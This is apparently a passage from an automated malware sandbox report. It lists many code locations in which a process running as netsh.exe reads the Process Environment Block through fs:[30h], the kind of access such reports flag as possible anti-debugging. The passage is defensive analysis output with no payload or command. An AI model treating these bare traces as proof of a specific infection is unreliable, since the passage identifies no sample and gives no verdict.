Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037D5BA5 mov eax, dword ptr fs:[00000030h] 9_2_037D5BA5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03734BAD mov eax, dword ptr fs:[00000030h] 9_2_03734BAD
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03734BAD mov eax, dword ptr fs:[00000030h] 9_2_03734BAD
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03734BAD mov eax, dword ptr fs:[00000030h] 9_2_03734BAD
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373B390 mov eax, dword ptr fs:[00000030h] 9_2_0373B390
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03732397 mov eax, dword ptr fs:[00000030h] 9_2_03732397
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C138A mov eax, dword ptr fs:[00000030h] 9_2_037C138A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373138B mov eax, dword ptr fs:[00000030h] 9_2_0373138B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373138B mov eax, dword ptr fs:[00000030h] 9_2_0373138B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373138B mov eax, dword ptr fs:[00000030h] 9_2_0373138B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037BD380 mov ecx, dword ptr fs:[00000030h] 9_2_037BD380
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03711B8F mov eax, dword ptr fs:[00000030h] 9_2_03711B8F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03711B8F mov eax, dword ptr fs:[00000030h] 9_2_03711B8F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0374927A mov eax, dword ptr fs:[00000030h] 9_2_0374927A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037BB260 mov eax, dword ptr fs:[00000030h] 9_2_037BB260
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037BB260 mov eax, dword ptr fs:[00000030h] 9_2_037BB260
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037D8A62 mov eax, dword ptr fs:[00000030h] 9_2_037D8A62
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037CEA55 mov eax, dword ptr fs:[00000030h] 9_2_037CEA55
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03794257 mov eax, dword ptr fs:[00000030h] 9_2_03794257
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03709240 mov eax, dword ptr fs:[00000030h] 9_2_03709240
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03709240 mov eax, dword ptr fs:[00000030h] 9_2_03709240
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03709240 mov eax, dword ptr fs:[00000030h] 9_2_03709240
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03709240 mov eax, dword ptr fs:[00000030h] 9_2_03709240
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372B236 mov eax, dword ptr fs:[00000030h] 9_2_0372B236
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372B236 mov eax, dword ptr fs:[00000030h] 9_2_0372B236
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372B236 mov eax, dword ptr fs:[00000030h] 9_2_0372B236
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372B236 mov eax, dword ptr fs:[00000030h] 9_2_0372B236
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372B236 mov eax, dword ptr fs:[00000030h] 9_2_0372B236
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372B236 mov eax, dword ptr fs:[00000030h] 9_2_0372B236
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03744A2C mov eax, dword ptr fs:[00000030h] 9_2_03744A2C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03744A2C mov eax, dword ptr fs:[00000030h] 9_2_03744A2C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h] 9_2_0372A229
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h] 9_2_0372A229
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h] 9_2_0372A229
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h] 9_2_0372A229
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h] 9_2_0372A229
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h] 9_2_0372A229
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h] 9_2_0372A229
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h] 9_2_0372A229
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h] 9_2_0372A229
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03705210 mov eax, dword ptr fs:[00000030h] 9_2_03705210
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03705210 mov ecx, dword ptr fs:[00000030h] 9_2_03705210
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03705210 mov eax, dword ptr fs:[00000030h] 9_2_03705210
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03705210 mov eax, dword ptr fs:[00000030h] 9_2_03705210
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0370AA16 mov eax, dword ptr fs:[00000030h] 9_2_0370AA16
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0370AA16 mov eax, dword ptr fs:[00000030h] 9_2_0370AA16
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037CAA16 mov eax, dword ptr fs:[00000030h] 9_2_037CAA16
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037CAA16 mov eax, dword ptr fs:[00000030h] 9_2_037CAA16
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03723A1C mov eax, dword ptr fs:[00000030h] 9_2_03723A1C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03718A0A mov eax, dword ptr fs:[00000030h] 9_2_03718A0A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h] 9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h] 9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h] 9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h] 9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h] 9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h] 9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h] 9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h] 9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h] 9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h] 9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h] 9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h] 9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h] 9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h] 9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03732AE4 mov eax, dword ptr fs:[00000030h] 9_2_03732AE4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03732ACB mov eax, dword ptr fs:[00000030h] 9_2_03732ACB
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0371AAB0 mov eax, dword ptr fs:[00000030h] 9_2_0371AAB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0371AAB0 mov eax, dword ptr fs:[00000030h] 9_2_0371AAB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373FAB0 mov eax, dword ptr fs:[00000030h] 9_2_0373FAB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037052A5 mov eax, dword ptr fs:[00000030h] 9_2_037052A5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037052A5 mov eax, dword ptr fs:[00000030h] 9_2_037052A5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037052A5 mov eax, dword ptr fs:[00000030h] 9_2_037052A5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037052A5 mov eax, dword ptr fs:[00000030h] 9_2_037052A5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037052A5 mov eax, dword ptr fs:[00000030h] 9_2_037052A5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373D294 mov eax, dword ptr fs:[00000030h] 9_2_0373D294
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373D294 mov eax, dword ptr fs:[00000030h] 9_2_0373D294
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0370B171 mov eax, dword ptr fs:[00000030h] 9_2_0370B171
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0370B171 mov eax, dword ptr fs:[00000030h] 9_2_0370B171
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0370C962 mov eax, dword ptr fs:[00000030h] 9_2_0370C962
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372B944 mov eax, dword ptr fs:[00000030h] 9_2_0372B944
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372B944 mov eax, dword ptr fs:[00000030h] 9_2_0372B944
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373513A mov eax, dword ptr fs:[00000030h] 9_2_0373513A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373513A mov eax, dword ptr fs:[00000030h] 9_2_0373513A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03724120 mov eax, dword ptr fs:[00000030h] 9_2_03724120
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03724120 mov eax, dword ptr fs:[00000030h] 9_2_03724120
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03724120 mov eax, dword ptr fs:[00000030h] 9_2_03724120
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03724120 mov eax, dword ptr fs:[00000030h] 9_2_03724120
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03724120 mov ecx, dword ptr fs:[00000030h] 9_2_03724120
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03709100 mov eax, dword ptr fs:[00000030h] 9_2_03709100
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03709100 mov eax, dword ptr fs:[00000030h] 9_2_03709100
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03709100 mov eax, dword ptr fs:[00000030h] 9_2_03709100
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037941E8 mov eax, dword ptr fs:[00000030h] 9_2_037941E8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0370B1E1 mov eax, dword ptr fs:[00000030h] 9_2_0370B1E1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0370B1E1 mov eax, dword ptr fs:[00000030h] 9_2_0370B1E1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0370B1E1 mov eax, dword ptr fs:[00000030h] 9_2_0370B1E1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037851BE mov eax, dword ptr fs:[00000030h] 9_2_037851BE
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037851BE mov eax, dword ptr fs:[00000030h] 9_2_037851BE
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037851BE mov eax, dword ptr fs:[00000030h] 9_2_037851BE
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037851BE mov eax, dword ptr fs:[00000030h] 9_2_037851BE
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h] 9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h] 9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037299BF mov eax, dword ptr fs:[00000030h] 9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h] 9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h] 9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037299BF mov eax, dword ptr fs:[00000030h] 9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h] 9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h] 9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037299BF mov eax, dword ptr fs:[00000030h] 9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h] 9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h] 9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037299BF mov eax, dword ptr fs:[00000030h] 9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037361A0 mov eax, dword ptr fs:[00000030h] 9_2_037361A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037361A0 mov eax, dword ptr fs:[00000030h] 9_2_037361A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C49A4 mov eax, dword ptr fs:[00000030h] 9_2_037C49A4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C49A4 mov eax, dword ptr fs:[00000030h] 9_2_037C49A4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C49A4 mov eax, dword ptr fs:[00000030h] 9_2_037C49A4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C49A4 mov eax, dword ptr fs:[00000030h] 9_2_037C49A4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037869A6 mov eax, dword ptr fs:[00000030h] 9_2_037869A6
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03732990 mov eax, dword ptr fs:[00000030h] 9_2_03732990
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372C182 mov eax, dword ptr fs:[00000030h] 9_2_0372C182
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373A185 mov eax, dword ptr fs:[00000030h] 9_2_0373A185
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037D1074 mov eax, dword ptr fs:[00000030h] 9_2_037D1074
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C2073 mov eax, dword ptr fs:[00000030h] 9_2_037C2073
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03720050 mov eax, dword ptr fs:[00000030h] 9_2_03720050
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03720050 mov eax, dword ptr fs:[00000030h] 9_2_03720050
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A830 mov eax, dword ptr fs:[00000030h] 9_2_0372A830
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A830 mov eax, dword ptr fs:[00000030h] 9_2_0372A830
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A830 mov eax, dword ptr fs:[00000030h] 9_2_0372A830
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A830 mov eax, dword ptr fs:[00000030h] 9_2_0372A830
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0371B02A mov eax, dword ptr fs:[00000030h] 9_2_0371B02A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0371B02A mov eax, dword ptr fs:[00000030h] 9_2_0371B02A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0371B02A mov eax, dword ptr fs:[00000030h] 9_2_0371B02A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0371B02A mov eax, dword ptr fs:[00000030h] 9_2_0371B02A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373002D mov eax, dword ptr fs:[00000030h] 9_2_0373002D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373002D mov eax, dword ptr fs:[00000030h] 9_2_0373002D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373002D mov eax, dword ptr fs:[00000030h] 9_2_0373002D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373002D mov eax, dword ptr fs:[00000030h] 9_2_0373002D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373002D mov eax, dword ptr fs:[00000030h] 9_2_0373002D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037D4015 mov eax, dword ptr fs:[00000030h] 9_2_037D4015
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037D4015 mov eax, dword ptr fs:[00000030h] 9_2_037D4015
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03787016 mov eax, dword ptr fs:[00000030h] 9_2_03787016
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03787016 mov eax, dword ptr fs:[00000030h] 9_2_03787016
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03787016 mov eax, dword ptr fs:[00000030h] 9_2_03787016
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037040E1 mov eax, dword ptr fs:[00000030h] 9_2_037040E1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037040E1 mov eax, dword ptr fs:[00000030h] 9_2_037040E1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037040E1 mov eax, dword ptr fs:[00000030h] 9_2_037040E1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372B8E4 mov eax, dword ptr fs:[00000030h] 9_2_0372B8E4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372B8E4 mov eax, dword ptr fs:[00000030h] 9_2_0372B8E4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037058EC mov eax, dword ptr fs:[00000030h] 9_2_037058EC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h] 9_2_0379B8D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0379B8D0 mov ecx, dword ptr fs:[00000030h] 9_2_0379B8D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h] 9_2_0379B8D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h] 9_2_0379B8D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h] 9_2_0379B8D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h] 9_2_0379B8D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373F0BF mov ecx, dword ptr fs:[00000030h] 9_2_0373F0BF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373F0BF mov eax, dword ptr fs:[00000030h] 9_2_0373F0BF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373F0BF mov eax, dword ptr fs:[00000030h] 9_2_0373F0BF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h] 9_2_037320A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h] 9_2_037320A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h] 9_2_037320A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h] 9_2_037320A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h] 9_2_037320A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h] 9_2_037320A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037490AF mov eax, dword ptr fs:[00000030h] 9_2_037490AF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03709080 mov eax, dword ptr fs:[00000030h] 9_2_03709080
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03783884 mov eax, dword ptr fs:[00000030h] 9_2_03783884
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03783884 mov eax, dword ptr fs:[00000030h] 9_2_03783884
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0371FF60 mov eax, dword ptr fs:[00000030h] 9_2_0371FF60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037D8F6A mov eax, dword ptr fs:[00000030h] 9_2_037D8F6A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0371EF40 mov eax, dword ptr fs:[00000030h] 9_2_0371EF40
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373E730 mov eax, dword ptr fs:[00000030h] 9_2_0373E730
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372B73D mov eax, dword ptr fs:[00000030h] 9_2_0372B73D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372B73D mov eax, dword ptr fs:[00000030h] 9_2_0372B73D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03704F2E mov eax, dword ptr fs:[00000030h] 9_2_03704F2E
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03704F2E mov eax, dword ptr fs:[00000030h] 9_2_03704F2E
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372F716 mov eax, dword ptr fs:[00000030h] 9_2_0372F716
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0379FF10 mov eax, dword ptr fs:[00000030h] 9_2_0379FF10
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0379FF10 mov eax, dword ptr fs:[00000030h] 9_2_0379FF10
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037D070D mov eax, dword ptr fs:[00000030h] 9_2_037D070D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037D070D mov eax, dword ptr fs:[00000030h] 9_2_037D070D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373A70E mov eax, dword ptr fs:[00000030h] 9_2_0373A70E
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373A70E mov eax, dword ptr fs:[00000030h] 9_2_0373A70E
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037437F5 mov eax, dword ptr fs:[00000030h] 9_2_037437F5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03718794 mov eax, dword ptr fs:[00000030h] 9_2_03718794
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03787794 mov eax, dword ptr fs:[00000030h] 9_2_03787794
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03787794 mov eax, dword ptr fs:[00000030h] 9_2_03787794
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03787794 mov eax, dword ptr fs:[00000030h] 9_2_03787794
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h] 9_2_0372AE73
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h] 9_2_0372AE73
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h] 9_2_0372AE73
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h] 9_2_0372AE73
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h] 9_2_0372AE73
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0371766D mov eax, dword ptr fs:[00000030h] 9_2_0371766D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h] 9_2_03717E41
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h] 9_2_03717E41
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h] 9_2_03717E41
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h] 9_2_03717E41
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h] 9_2_03717E41
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h] 9_2_03717E41
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037CAE44 mov eax, dword ptr fs:[00000030h] 9_2_037CAE44
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037CAE44 mov eax, dword ptr fs:[00000030h] 9_2_037CAE44
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037BFE3F mov eax, dword ptr fs:[00000030h] 9_2_037BFE3F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0370E620 mov eax, dword ptr fs:[00000030h] 9_2_0370E620
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373A61C mov eax, dword ptr fs:[00000030h] 9_2_0373A61C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373A61C mov eax, dword ptr fs:[00000030h] 9_2_0373A61C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0370C600 mov eax, dword ptr fs:[00000030h] 9_2_0370C600
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0370C600 mov eax, dword ptr fs:[00000030h] 9_2_0370C600
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0370C600 mov eax, dword ptr fs:[00000030h] 9_2_0370C600
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03738E00 mov eax, dword ptr fs:[00000030h] 9_2_03738E00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C1608 mov eax, dword ptr fs:[00000030h] 9_2_037C1608
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037316E0 mov ecx, dword ptr fs:[00000030h] 9_2_037316E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037176E2 mov eax, dword ptr fs:[00000030h] 9_2_037176E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037D8ED6 mov eax, dword ptr fs:[00000030h] 9_2_037D8ED6
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03748EC7 mov eax, dword ptr fs:[00000030h] 9_2_03748EC7
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037BFEC0 mov eax, dword ptr fs:[00000030h] 9_2_037BFEC0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037336CC mov eax, dword ptr fs:[00000030h] 9_2_037336CC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037D0EA5 mov eax, dword ptr fs:[00000030h] 9_2_037D0EA5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037D0EA5 mov eax, dword ptr fs:[00000030h] 9_2_037D0EA5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037D0EA5 mov eax, dword ptr fs:[00000030h] 9_2_037D0EA5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037846A7 mov eax, dword ptr fs:[00000030h] 9_2_037846A7
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0379FE87 mov eax, dword ptr fs:[00000030h] 9_2_0379FE87
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372C577 mov eax, dword ptr fs:[00000030h] 9_2_0372C577
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372C577 mov eax, dword ptr fs:[00000030h] 9_2_0372C577
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03727D50 mov eax, dword ptr fs:[00000030h] 9_2_03727D50
